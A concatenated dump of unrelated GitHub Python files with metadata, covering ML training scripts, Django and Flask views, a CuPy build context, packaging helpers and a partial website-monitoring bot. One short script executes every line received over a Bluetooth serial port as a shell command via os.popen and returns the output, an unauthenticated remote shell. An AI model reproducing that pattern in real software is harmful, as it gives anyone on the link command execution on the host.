        "Topic :: Software Development :: Debuggers",
        "Topic :: Software Development :: Libraries :: Application Frameworks",
        "Topic :: Software Development :: Libraries :: Python Modules",
    ],
)
| Carbon8Jim/marcus | setup.py | setup.py | py | 1,715 | python | en | code | null | github-code | 36 | [
{
"api_name": "re.findall",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "setuptools.setup",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "marcus.__version__",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "setuptools.find_packag... |
25796479489 | from django.core.management import BaseCommand
from integrations.left_right_eye_nn.LeftRightEyeNN import LeftRightEyeNN
class Command(BaseCommand):
    """Django management command that trains the left/right-eye classifier."""
    def handle(self, *args, **options):
        """Entry point invoked by `manage.py left_right_eye`; delegates to main()."""
        self.main()
    def main(self):
        """Build the training dataset, then fit the LeftRightEyeNN model."""
        print("Training Left Right Eye NN")
        nn = LeftRightEyeNN()
        nn.generate_data()
        nn.train()
{
"api_name": "django.core.management.BaseCommand",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "integrations.left_right_eye_nn.LeftRightEyeNN.LeftRightEyeNN",
"line_number": 13,
"usage_type": "call"
}
] |
6446628913 | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 5 22:38:07 2020
@author: Ivano Dibenedetto mat.654648
"""
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
from PIL import Image, ImageTk
import cv2
import tensorflow as tf
root = Tk(className=' CLASSIFICATORE')
root.geometry("800x600+250+150")
root.resizable(width=False, height=False)
filename = ""
CATEGORIES = ["Covid", "Polmonite"]
def LoadImage():
    """Ask the user for an image file, preview it in the window, classify it."""
    chosen_path = filedialog.askopenfilename(
        initialdir="/",
        title="Select file",
        filetypes=(("jpeg files", "*.jpg"), ("png files", "*.png")),
    )
    preview = Image.open(chosen_path)
    preview = preview.resize((300, 300), Image.ANTIALIAS)
    photo = ImageTk.PhotoImage(preview)
    image_label = Label(image=photo, text=chosen_path)
    # Keep a reference on the widget so Tk doesn't garbage-collect the photo.
    image_label.image = photo
    image_label.place(x=250, y=150)
    classifica(chosen_path)
def classifica(filename):
    """Classify the chest X-ray at *filename* with the saved CNN model.

    Updates the module-level ``predLabel`` widget with the result text.
    """
    print(filename)
    model = tf.keras.models.load_model("X-ray_CNN.model")
    prediction = model.predict_proba([prepare(filename)])
    score = prediction[0]
    # User-facing label is intentionally Italian ("the patient suffers from ...").
    ris = "il paziente è affetto da " + CATEGORIES[int(prediction[0][0]) ]
    diagnostic_line = (
        "This image is %.2f percent COVID and %.2f percent PNEUMONIA."
        % (100 * (1 - score), 100 * score)
    )
    print(diagnostic_line)
    predLabel.config(text=ris)
def prepare(filepath):
    """Load an image as grayscale, resize it, and shape it as a 1-image batch.

    Returns an array of shape (1, 250, 250, 1) ready for Keras inference.
    """
    side = 250
    grayscale = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE)
    resized = cv2.resize(grayscale, (side, side))
    return resized.reshape(-1, side, side, 1)
introLabel = ttk.Label(root,
text="Rete neurale che classifica l'immagine di una radiografia al torace in una delle possibili etichette [Polmonite, Covid-19]")
introLabel.place(relx=0.1, rely=0.05)
loadButton = ttk.Button(text="Carica immagine", command=LoadImage)
loadButton.place(relx=0.5, rely=0.15, anchor=CENTER)
predLabel = ttk.Label(root, text="")
predLabel.place(relx=0.5, rely=0.8, anchor=CENTER)
root.mainloop()
| Ivanodib/Neural-Network | GUI.py | GUI.py | py | 2,060 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tkinter.filedialog.askopenfilename",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "tkinter.filedialog",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "PIL.Image.open",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "... |
# Example: writing rows into an Excel workbook with openpyxl.
import openpyxl
wb = openpyxl.Workbook()
sheet = wb.active
# Sheet title and A1 header are Chinese runtime data ("Douban" / "Douban Books").
sheet.title ='豆瓣'
sheet['A1'] = '豆瓣读书'
rows = [['美国队长','钢铁侠','蜘蛛侠','雷神'],['是','漫威','宇宙', '经典','人物']]
# append() writes each list as the next row, starting below A1.
for i in rows:
    sheet.append(i)
print(rows)
wb.save('Marvel.xlsx')
{
"api_name": "openpyxl.Workbook",
"line_number": 4,
"usage_type": "call"
}
] |
36567852803 | from django.shortcuts import render
from django.contrib.auth import login, logout
from django.http.response import HttpResponseRedirect, JsonResponse
from .forms import RegistrationForm, LoginForm
from django.contrib.auth.models import User
from django_mfa.models import is_u2f_enabled
from django.conf import settings
def index(request):
    """Login/landing view: authenticates POSTed credentials via LoginForm.

    Returns JSON for AJAX posts; renders the login template on GET.
    """
    if request.user and request.user.is_authenticated:
        # Already signed in: go straight to the post-login page.
        return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL)
    if request.method == 'POST':
        form = LoginForm(request.POST, request.FILES)
        if form.is_valid():
            user = form.user
            if is_u2f_enabled(user):
                # Stash the user so the U2F second factor can verify them.
                request.session['u2f_pre_verify_user_pk'] = user.pk
                request.session['u2f_pre_verify_user_backend'] = user.backend
            # NOTE(review): login() runs even when U2F is enabled — confirm the
            # U2F flow is expected to proceed after the session login.
            login(request, form.user)
            return JsonResponse({"error": False})
        else:
            return JsonResponse({"error": True, "errors": form.errors})
    context = {
        "registration_form": RegistrationForm,
        "login_form": LoginForm
    }
    return render(request, 'login.html', context)
def register(request):
    """Create a user from RegistrationForm data and log them in; returns JSON."""
    form = RegistrationForm(request.POST, request.FILES)
    if form.is_valid():
        email = form.cleaned_data.get('email')
        password = form.cleaned_data.get('password')
        # The email address doubles as the username.
        user = User.objects.create(email=email, username=email)
        user.set_password(password)  # hash the password properly
        user.save()
        # login() needs a backend set when authenticate() was not called.
        user.backend = 'django.contrib.auth.backends.ModelBackend'
        login(request, user)
        return JsonResponse({"error": False})
    else:
        return JsonResponse({"error": True, "errors": form.errors})
def home(request):
    """Render the post-login landing page."""
    return render(request, "home.html")
def log_out(request):
    """Terminate the session and redirect back to the login page."""
    logout(request)
    return HttpResponseRedirect("/")
| MicroPyramid/django-mfa | sandbox/sample/views.py | views.py | py | 1,801 | python | en | code | 176 | github-code | 36 | [
{
"api_name": "django.http.response.HttpResponseRedirect",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "django.conf.settings.LOGIN_REDIRECT_URL",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "django.conf.settings",
"line_number": 12,
"usage_t... |
7048207063 | from flask import Flask, request, jsonify
from flask_pymongo import PyMongo
from bson.objectid import ObjectId
import socket
import gridfs
UPLOAD_FOLDER = 'upload_temp'
ALLOWED_EXTENSIONS = {'pdf'}
app = Flask(__name__)
app.config["MONGO_URI"] = "mongodb://mongo:27017/dev"
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.secret_key = 'hogehoge'
mongo = PyMongo(app)
db = mongo.db
fs = gridfs.GridFS(db)
def list_url():
    """Return up to the 50 most recently uploaded files stored in GridFS.

    Each entry carries the GridFS id (as a string), the original filename,
    and the stored download URL.
    """
    recent_files = fs.find().sort("uploadDate", -1).limit(50)
    entries = []
    for grid_out in recent_files:
        entries.append({
            "_id": str(grid_out._id),
            "filename": grid_out._file['filename'],
            "file_url": grid_out._file['file_url'],
        })
    return entries
@app.route("/list")
def index():
    """List recent PDFs, rewriting internal upload-host URLs to the public host."""
    pdflist = list_url()
    # TODO need to fix abstractive
    for p in pdflist:
        # Swap the internal service hostname for the externally reachable one.
        p['file_url'] = p['file_url'].replace("doktor-upload:3000","doktor.a910.tak-cslab.org:30010")
    # pdflist = ["http://doktor-upload:3000/" + word for word in pdflist]
    hostname = socket.gethostname()  # NOTE(review): computed but unused — confirm removable
    return jsonify(pdflist)
@app.route("/tasks")
def get_all_tasks():
    """Return every task document as JSON: {"data": [{"id", "task"}, ...]}."""
    serialized = [
        {"id": str(task["_id"]), "task": task["task"]}
        for task in db.task.find()
    ]
    return jsonify(data=serialized)
@app.route("/task", methods=["POST"])
def create_task():
    """Insert a new task from the JSON body: {"task": <text>}."""
    data = request.get_json(force=True)
    db.task.insert_one({"task": data["task"]})
    return jsonify(
        message="Task saved successfully!"
    )
@app.route("/task/<id>", methods=["PUT"])
def update_task(id):
    """Replace the task text of document *id*; report whether it existed."""
    data = request.get_json(force=True)["task"]
    response = db.task.update_one({"_id": ObjectId(id)}, {
        "$set": {"task": data}})
    # matched_count > 0 means a document with that id existed.
    if response.matched_count:
        message = "Task updated successfully!"
    else:
        message = "No Task found!"
    return jsonify(
        message=message
    )
@app.route("/task/<id>", methods=["DELETE"])
def delete_task(id):
    """Delete the task document *id*; report whether anything was removed."""
    response = db.task.delete_one({"_id": ObjectId(id)})
    if response.deleted_count:
        message = "Task deleted successfully!"
    else:
        message = "No Task found!"
    return jsonify(
        message=message
    )
@app.route("/tasks/delete", methods=["POST"])
def delete_all_tasks():
    """Delete every task document and confirm via JSON."""
    # Collection.remove() was deprecated and then removed in PyMongo 4;
    # delete_many({}) is the supported way to clear the whole collection.
    db.task.delete_many({})
    return jsonify(
        message="All Tasks deleted!"
    )
if __name__ == "__main__":
app.run(host="0.0.0.0", port=4000, debug=True)
| cdsl-research/doktor | service/search/web/main.py | main.py | py | 2,596 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "flask_pymongo.PyMongo",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "gridfs.GridFS",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "socket.gethostname",
... |
import os
from setuptools import setup, find_packages
# Resolve files relative to this setup.py so builds work from any directory.
here = os.path.abspath(os.path.dirname(__file__))
# The Markdown README doubles as the PyPI long description.
with open(os.path.join(here, 'README.md')) as f:
    README = f.read()
# Runtime dependency.
requires = [
    'gces>=0.0.9a0',
]
# Optional dependency groups, e.g. `pip install gces_subsfm[test]`.
extras_require = {
    'test': [
        'coverage==4.5.1',
        'pytest==3.8.1',
        'pytest-cov==2.6.0',
        'pytest-mock',
        'pytest-capturelog>=0.7',
    ],
    'ci': [
        'python-coveralls==2.9.1',
    ]
}
setup(
    name='gces_subsfm',
    version='0.0.1a0',
    description='GCES Subscriber Framework',
    long_description=README,
    long_description_content_type='text/markdown',
    classifiers=[
        'Programming Language :: Python',
        'License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)',
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
    ],
    author='Daniel Debonzi',
    author_email='debonzi@gmail.com',
    url='',
    keywords='pubsub gces google',
    packages=find_packages(),
    include_package_data=True,
    zip_safe=False,
    extras_require=extras_require,
    install_requires=requires,
    entry_points = {
        'console_scripts': [
            'gces-subsfm = gces_subsfm:main'
        ]
    }
)
| debonzi/gces-subscriber-framework | setup.py | setup.py | py | 1,464 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_nu... |
8445855838 | import argparse
import os
import sys
from typing import Any, List, Mapping, Optional, Tuple
import cupy_builder
def _get_env_bool(name: str, default: bool, env: Mapping[str, str]) -> bool:
return env[name] != '0' if name in env else default
def _get_env_path(name: str, env: Mapping[str, str]) -> List[str]:
paths = env.get(name, None)
if paths is None:
return []
return [x for x in paths.split(os.pathsep) if len(x) != 0]
class Context:
    # Aggregates all environment- and command-line-driven build configuration
    # for the CuPy build (CUDA Python / HIP switches, extra search paths, and
    # the --cupy-* options stripped from argv).
    def __init__(
            self, source_root: str, *,
            _env: Mapping[str, str] = os.environ,
            _argv: List[str] = sys.argv):
        # _env/_argv default to real process state; tests inject fakes instead.
        self.source_root = source_root
        self.use_cuda_python = _get_env_bool(
            'CUPY_USE_CUDA_PYTHON', False, _env)
        self.use_hip = _get_env_bool(
            'CUPY_INSTALL_USE_HIP', False, _env)
        self.include_dirs = _get_env_path('CUPY_INCLUDE_PATH', _env)
        self.library_dirs = _get_env_path('CUPY_LIBRARY_PATH', _env)
        # parse_args consumes the --cupy-* options and writes the remaining
        # arguments back into the caller's argv list in place.
        cmdopts, _argv[:] = parse_args(_argv)
        self.package_name: str = cmdopts.cupy_package_name
        self.long_description_path: Optional[str] = (
            cmdopts.cupy_long_description)
        self.wheel_libs: List[str] = cmdopts.cupy_wheel_lib
        self.wheel_includes: List[str] = cmdopts.cupy_wheel_include
        self.wheel_metadata_path: Optional[str] = (
            cmdopts.cupy_wheel_metadata)
        self.no_rpath: bool = cmdopts.cupy_no_rpath
        self.profile: bool = cmdopts.cupy_profile
        # Coverage implies both Cython line tracing and HTML annotation.
        self.linetrace: bool = cmdopts.cupy_coverage
        self.annotate: bool = cmdopts.cupy_coverage
        self.use_stub: bool = cmdopts.cupy_no_cuda
        # Environment variables can force flags on in addition to the CLI.
        if _get_env_bool('CUPY_INSTALL_NO_RPATH', False, _env):
            self.no_rpath = True
        if os.environ.get('READTHEDOCS', None) == 'True':
            self.use_stub = True
        self.features = cupy_builder.get_features(self)
def parse_args(argv: List[str]) -> Tuple[Any, List[str]]:
    """Split CuPy-specific build options out of *argv*.

    Returns ``(parsed_options, remaining_args)``; unrecognized arguments
    are passed through untouched so setuptools can handle them later.
    """
    arg_parser = argparse.ArgumentParser(add_help=False)
    arg_parser.add_argument(
        '--cupy-package-name', type=str, default='cupy',
        help='alternate package name')
    arg_parser.add_argument(
        '--cupy-long-description', type=str, default=None,
        help='path to the long description file (reST)')
    arg_parser.add_argument(
        '--cupy-wheel-lib', type=str, action='append', default=[],
        help='shared library to copy into the wheel '
             '(can be specified for multiple times)')
    arg_parser.add_argument(
        '--cupy-wheel-include', type=str, action='append', default=[],
        help='An include file to copy into the wheel. '
             'Delimited by a colon. '
             'The former part is a full path of the source include file and '
             'the latter is the relative path within cupy wheel. '
             '(can be specified for multiple times)')
    arg_parser.add_argument(
        '--cupy-wheel-metadata', type=str, default=None,
        help='wheel metadata (cupy/.data/_wheel.json)')
    # Boolean switches, all defaulting to off.
    boolean_flags = [
        ('--cupy-no-rpath',
         'disable adding default library directories to RPATH'),
        ('--cupy-profile', 'enable profiling for Cython code'),
        ('--cupy-coverage', 'enable coverage for Cython code'),
        ('--cupy-no-cuda', 'build CuPy with stub header file'),
    ]
    for flag, description in boolean_flags:
        arg_parser.add_argument(
            flag, action='store_true', default=False, help=description)
    return arg_parser.parse_known_args(argv)
| cupy/cupy | install/cupy_builder/_context.py | _context.py | py | 3,616 | python | en | code | 7,341 | github-code | 36 | [
{
"api_name": "typing.Mapping",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.Mapping",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "os.pathsep",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "typing.List",
"line_... |
34957895973 | from os import path
import shutil, glob
from subprocess import Popen, PIPE, STDOUT
from lib import cd, CouldNotLocate, task
class IEError(Exception):
    """Raised when the NSIS-based IE packaging step fails."""
@task
def package_ie(build, root_dir, **kw):
    """Build the IE installers by running NSIS for each architecture.

    Verifies `makensis` is on PATH (raising CouldNotLocate otherwise), runs
    the x86 and x64 setup scripts under <root_dir>/ie/dist, and renames each
    produced installer to "<app name>-<version>-<arch>.exe". Raises IEError
    when an NSIS build fails.
    """
    nsis_check = Popen('makensis -VERSION', shell=True, stdout=PIPE, stderr=STDOUT)
    stdout, stderr = nsis_check.communicate()
    if nsis_check.returncode != 0:
        raise CouldNotLocate("Make sure the 'makensis' executable is in your path")
    # JCB: need to check nsis version in stdout here?
    with cd(path.join(root_dir, 'ie')):
        for arch in ('x86', 'x64'):
            nsi_filename = "setup-{arch}.nsi".format(arch=arch)
            package = Popen('makensis {nsi}'.format(nsi=path.join("dist", nsi_filename)),
                stdout=PIPE, stderr=STDOUT, shell=True
            )
            out, err = package.communicate()
            if package.returncode != 0:
                raise IEError("problem running {arch} IE build: {stdout}".format(arch=arch, stdout=out))
            # move output to root of IE directory
            for exe in glob.glob(path.join("dist/*.exe")):
                shutil.move(exe, "{name}-{version}-{arch}.exe".format(
                    name=build.config.get('name', 'Forge App'),
                    version=build.config.get('version', '0.1'),
                    arch=arch
                ))
{
"api_name": "subprocess.Popen",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "subprocess.PIPE",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "subprocess.STDOUT",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "lib.CouldNotLocate... |
35132702835 | import dataclasses
import tensorflow as tf
import gin.tf
from layers.embeddings_layers import EmbeddingsConfig
from models.transformer_softmax_model import TransformerSoftmaxModel, TransformerSoftmaxModelConfig
from datasets.softmax_datasets import MaskedEntityOfEdgeDataset
from datasets.dataset_utils import DatasetType
class TestTransformerSoftmaxModel(tf.test.TestCase):
    """Shape and parameter-count tests for TransformerSoftmaxModel.

    Each test builds the model against a tiny fixture dataset (batch_size=5,
    3 entities, 2 relations) and checks the output shape plus the exact
    trainable parameter count for a given configuration.
    """
    DATASET_PATH = '../../data/test_data'
    def setUp(self):
        # Reset gin so configs from other test modules cannot leak in.
        gin.clear_config()
        # NOTE(review): `share_encoder_parameters` appears twice in the gin
        # config below (the second assignment wins) — confirm intentional.
        gin.parse_config("""
            StackedTransformerEncodersLayer.layers_count = 3
            StackedTransformerEncodersLayer.attention_heads_count = 4
            StackedTransformerEncodersLayer.attention_head_dimension = 5
            StackedTransformerEncodersLayer.pointwise_hidden_layer_dimension = 4
            StackedTransformerEncodersLayer.dropout_rate = 0.5
            StackedTransformerEncodersLayer.share_encoder_parameters = False
            StackedTransformerEncodersLayer.share_encoder_parameters = False
            StackedTransformerEncodersLayer.encoder_layer_type = %TransformerEncoderLayerType.PRE_LAYER_NORM
        """)
        # shuffle_dataset=False keeps the sampled batch deterministic.
        dataset = MaskedEntityOfEdgeDataset(
            dataset_id="dataset1", inference_mode=False, dataset_type=DatasetType.TRAINING,
            data_directory=self.DATASET_PATH, shuffle_dataset=False, batch_size=5
        )
        self.model_inputs = next(iter(dataset.samples))
        self.embeddings_config = EmbeddingsConfig(
            entities_count=3, relations_count=2, embeddings_dimension=6, use_special_token_embeddings=True,
        )
        self.default_model_config = TransformerSoftmaxModelConfig(
            use_pre_normalization=True, pre_dropout_rate=0.5
        )
    def test_model_architecture(self):
        # Baseline config: logits over the 3 entities.
        model = TransformerSoftmaxModel(self.embeddings_config, self.default_model_config)
        outputs = model(self.model_inputs)
        self.assertAllEqual((5, 3), outputs.shape)
        self.assertEqual(735, model.count_params())
    def test_pre_normalization_disabled(self):
        # Disabling pre-normalization removes the extra norm parameters.
        model_config = dataclasses.replace(self.default_model_config, use_pre_normalization=False)
        model = TransformerSoftmaxModel(self.embeddings_config, model_config)
        outputs = model(self.model_inputs)
        self.assertAllEqual((5, 3), outputs.shape)
        self.assertEqual(723, model.count_params())
    def test_use_relations_outputs(self):
        # With relation outputs, logits cover entities + relations (3 + 2).
        model_config = dataclasses.replace(self.default_model_config, use_relations_outputs=True)
        model = TransformerSoftmaxModel(self.embeddings_config, model_config)
        outputs = model(self.model_inputs)
        self.assertAllEqual((5, 5), outputs.shape)
        self.assertEqual(737, model.count_params())
    def test_do_not_apply_projection_layer(self):
        # Skipping the projection layer returns raw embedding-sized outputs.
        model_config = dataclasses.replace(self.default_model_config)
        model = TransformerSoftmaxModel(self.embeddings_config, model_config)
        outputs = model(self.model_inputs, apply_projection_layer=False)
        self.assertAllEqual((5, 6), outputs.shape)
        self.assertEqual(735, model.count_params())
if __name__ == '__main__':
tf.test.main()
| Dawidsoni/relation-embeddings | test/models/test_transformer_softmax_model.py | test_transformer_softmax_model.py | py | 3,150 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.test",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "gin.tf.clear_config",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "gin.tf",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "gin.tf.parse_config",... |
13927812222 |
# Script: dump annotated git log (with patches) from a local repository
# so commits can later be parsed into {Hash, Commit-m, Summary, gitdiff} records.
from git import Repo
# NOTE(review): hardcoded user-specific path; Repo.init() initializes a repo —
# for an existing clone, plain Repo(path) is probably what was intended.
repo = Repo.init('/Users/yitongli/pytorch')
# print([str(commit.summary) for commit in repo.iter_commits()][1])
# print([str(commit.count) for commit in repo.iter_commits()][0])
# print([str(commit.size) for commit in repo.iter_commits()][0])
# print([str(commit.hexsha) for commit in repo.iter_commits()][0])
# print([commit.message for commit in repo.iter_commits()][2])
# repo.git.diff('HEAD~1')
#Reference:https://azzamsa.com/n/gitpython-intro/
#Unwrapped git functionality
# Raw `git log -p` output with a custom record-delimiting format string.
logs=repo.git.log("-p","--format=' }\n{'Hash': '%H', 'Commit-m': '%f', 'Summary': '%b',\n 'gitdiff': '")
logs_split = logs.splitlines()
type(logs_split)  # NOTE(review): no-op expression statement — leftover debug
# with open("txt.txt", "w") as f:
#     for t in logs_split[:1000]:
#         print(t, file=f)
# ID_mark = [ i for i in range(len(logs_split)) if logs_split[i] == '<<<<<<<ID>>>>>>>' ]
# gitdiff_mark = [ i[0:11] for i in logs_split]
# gitdiff_mark_index = [gitdiff_mark.index('diff --git ',ID_mark[i]) for i in range(len(ID_mark))]
# logs_split_cleaner = logs_split
# for i in gitdiff_mark_index:
#     logs_split_cleaner[i-1] = 'gitdiff:'
#
#
# filter(lambda x: ' A ' in x, logs_split_cleaner)
# NOTE: this is an alias, not a copy — both names refer to the same list.
logs_split_cleaner = logs_split
for i in logs_split_cleaner[:1000]:
    print(i)
# logs_H=repo.git.log("--pretty=format:(%H,%f,%b)")
# logs_split_H = logs_H.splitlines()
# for i in logs_split_H[:50]:
#     print(i)
| Spring010/kano_auto_commit_message | repo.py | repo.py | py | 1,374 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "git.Repo.init",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "git.Repo",
"line_number": 3,
"usage_type": "name"
}
] |
# Remote command runner: reads lines over a Bluetooth serial link, executes
# each line as a shell command, and writes the output back.
# SECURITY: this intentionally executes arbitrary received text via the shell
# (os.popen). Anyone who can reach this serial port gets a remote shell —
# deploy only on trusted, paired links.
import serial
import os
# Port index 0 at 9600 baud; pyserial also accepts device names like 'COM1'.
bluetooth = serial.Serial(0,9600)
#ser.isOpen()
while True:
    recieve = bluetooth.readline()
    # Strip the trailing two bytes (the "\r\n" line terminator).
    recieve = recieve[0:-2]
    result = os.popen(recieve).read()
    bluetooth.write(result)
    # Separator line so consecutive command outputs are distinguishable.
    bluetooth.write('---------------------------------------------------------\n')
{
"api_name": "serial.Serial",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "os.popen",
"line_number": 8,
"usage_type": "call"
}
] |
27688509753 | import csv
import os
import numpy as np
import tensorflow as tf
from tensorflow.keras.preprocessing.image import ImageDataGenerator
def get_data(filename):
    """Parse a sign-language MNIST CSV into (images, labels) numpy arrays.

    The file's first line is a header and is skipped. Every other line holds
    a label followed by 784 pixel values, which are reshaped into a 28x28
    image. Returns float arrays of shape (n, 28, 28) and (n,).
    """
    with open(filename) as training_file:
        reader = csv.reader(training_file, delimiter=',')
        next(reader, None)  # drop the header row
        label_rows = []
        image_rows = []
        for row in reader:
            label_rows.append(row[0])
            pixels = row[1:785]
            # Split the flat 784-value row into 28 rows of 28 pixels.
            image_rows.append(np.array_split(pixels, 28))
    images = np.array(image_rows).astype('float')
    labels = np.array(label_rows).astype('float')
    return images, labels
# Hard-coded paths to the Kaggle "Sign Language MNIST" CSV dumps.
path_sign_mnist_train = "/Users/seanjudelyons/Downloads/3258_5337_bundle_archive/sign_mnist_train.csv"
path_sign_mnist_test = "/Users/seanjudelyons/Downloads/3258_5337_bundle_archive/sign_mnist_test.csv"
training_images, training_labels = get_data(path_sign_mnist_train)
testing_images, testing_labels = get_data(path_sign_mnist_test)
print(training_images.shape)
print(training_labels.shape)
print(testing_images.shape)
print(testing_labels.shape)
# Their output should be:
# (27455, 28, 28)
# (27455,)
# (7172, 28, 28)
# (7172,)
# Conv2D needs an explicit channel axis: (N, 28, 28) -> (N, 28, 28, 1).
training_images = np.expand_dims(training_images, axis=3)
testing_images = np.expand_dims(testing_images, axis=3)
# Training-time augmentation: rescale to [0, 1] plus random affine jitter.
train_datagen = ImageDataGenerator(
    rescale=1. / 255,
    rotation_range=40,
    width_shift_range=0.2,
    height_shift_range=0.2,
    shear_range=0.2,
    zoom_range=0.2,
    horizontal_flip=True,
    fill_mode='nearest')
# Validation data is only rescaled -- no augmentation.
validation_datagen = ImageDataGenerator(
    rescale=1. / 255)
#next
# Define the model
# Use no more than 2 Conv2D and 2 MaxPooling2D
model = tf.keras.models.Sequential([
    # Note the input shape is 28 x 28 grayscale.
    tf.keras.layers.Conv2D(64, (3,3), activation='relu', input_shape=(28, 28, 1)),
    tf.keras.layers.MaxPooling2D(2, 2),
    tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2,2),
    tf.keras.layers.Flatten(),
    tf.keras.layers.Dense(128, activation='relu'),
    tf.keras.layers.Dense(26, activation='softmax') # 26 alphabets/hand-signs so 26 classes!
])
# Compile Model.
# The labels produced by get_data are plain integer class ids (0-25), not
# one-hot vectors, so 'sparse_categorical_crossentropy' is required here;
# plain 'categorical_crossentropy' expects one-hot targets, which is why it
# "doesn't work".
model.compile(loss = 'sparse_categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
# Train the Model
# NOTE(review): fit_generator is deprecated in recent TF2 releases in favour
# of model.fit (which accepts the same generators) -- kept as-is for
# compatibility with the TF version this script targets.
history = model.fit_generator(train_datagen.flow(training_images, training_labels, batch_size=32),
                              epochs=2,
                              validation_data=validation_datagen.flow(testing_images, testing_labels, batch_size=32),
                              validation_steps=len(testing_images) / 32)
# Evaluate once on the test set; the original called evaluate twice back to
# back, which only repeated the same computation and output.
model.evaluate(testing_images, testing_labels)
# Plot the chart for accuracy and loss on both training and validation
import matplotlib.pyplot as plt
# Per-epoch metrics recorded by the fit call above.
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'r', label='Training accuracy')
plt.plot(epochs, val_acc, 'b', label='Validation accuracy')
plt.title('Training and validation accuracy')
plt.legend()
# Second figure so the loss curves do not share axes with accuracy.
plt.figure()
plt.plot(epochs, loss, 'r', label='Training Loss')
plt.plot(epochs, val_loss, 'b', label='Validation Loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
| seanjudelyons/TensorFlow_Certificate | Sign Language Part 2(CNN) Last exercise.py | Sign Language Part 2(CNN) Last exercise.py | py | 4,470 | python | en | code | 12 | github-code | 36 | [
{
"api_name": "csv.reader",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.array_split",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_numb... |
40156974543 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
# Copyright (c) 2017/18 Dennis Wulfert
#
# GNU GENERAL PUBLIC LICENSE
# Version 2, June 1991
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import socket
import subprocess
import telepot
import importlib
import time
import sys
import CONFIG
# from multiprocessing.dummy import Pool, Queue # multithreading
import os
from datetime import datetime
import logging
import argparse
import requests
from requests.exceptions import ConnectionError
from systemd.journal import JournalHandler
# Route this script's log records to the systemd journal.
log = logging.getLogger('EM')
log.addHandler(JournalHandler())
log.setLevel(logging.INFO)
# NOTE(review): 'socket' is already imported above -- this re-import is
# harmless but redundant.
import socket
# Process-wide default timeout for all sockets created afterwards.
socket.setdefaulttimeout(20)
# from multiprocessing import Pool # multiprocessing
# Python 2 compatibility shim: reload()/setdefaultencoding only exist there.
try:
    reload(sys)
    sys.setdefaultencoding('utf8')
except NameError:
    # for python 3
    pass
# Telegram bot token pulled from the local CONFIG module.
token = CONFIG.telegram_token
# Last report produced per check; used to suppress repeated identical alerts.
chronic = {
    'check_websites': None,
}
def online(host="8.8.8.8", port=53, timeout=3):
    """
    Return True when a TCP connection to ``host:port`` succeeds, else False.

    Host: 8.8.8.8 (google-public-dns-a.google.com)
    OpenPort: 53/tcp
    Service: domain (DNS/TCP)
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Per-socket timeout instead of mutating the process-wide default
        # (the original socket.setdefaulttimeout() affected every socket).
        sock.settimeout(timeout)
        sock.connect((host, port))
        return True
    except socket.error as ex:
        print(ex)
        return False
    finally:
        # Always release the file descriptor; the original leaked it.
        sock.close()
def check_websites():
    '''
    Probe every URL in CONFIG.urls with an HTTP HEAD request and build a
    status report (one "- <url> <status>" line per site, just the URL when
    the host is unreachable).

    Returns ``(True, '')`` when the report is identical to the previous run
    so the caller stays silent, otherwise ``(False, report)``.
    '''
    output = ''
